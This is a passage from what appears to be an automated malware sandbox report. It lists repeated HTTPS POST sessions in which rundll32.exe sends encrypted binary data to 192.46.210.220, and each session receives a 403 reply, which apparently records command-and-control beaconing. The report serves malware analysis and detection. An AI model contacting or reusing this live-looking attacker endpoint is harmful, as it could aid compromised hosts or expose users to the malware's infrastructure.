                                                                                                      2021-10-28 02:47:14 UTC120OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:14 UTC124INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.749877192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:15 UTC124OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:15 UTC125OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:16 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:16 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.749888192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:18 UTC129OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:18 UTC130OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:18 UTC134INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.749891192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:19 UTC134OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:19 UTC135OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:19 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.749897192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:21 UTC139OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:21 UTC139OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:22 UTC144INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.749899192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:23 UTC144OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:23 UTC144OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:23 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.749789192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:31 UTC14OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:31 UTC15OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:32 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.749906192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:25 UTC149OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:25 UTC149OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:26 UTC154INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.749908192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:26 UTC154OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:26 UTC154OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:27 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.749914192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:29 UTC159OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:29 UTC159OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:30 UTC164INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.749916192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:30 UTC164OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:30 UTC164OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:31 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.749922192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:33 UTC169OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:33 UTC169OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:34 UTC174INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.749924192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:35 UTC174OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:35 UTC174OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:35 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.749930192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:38 UTC179OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
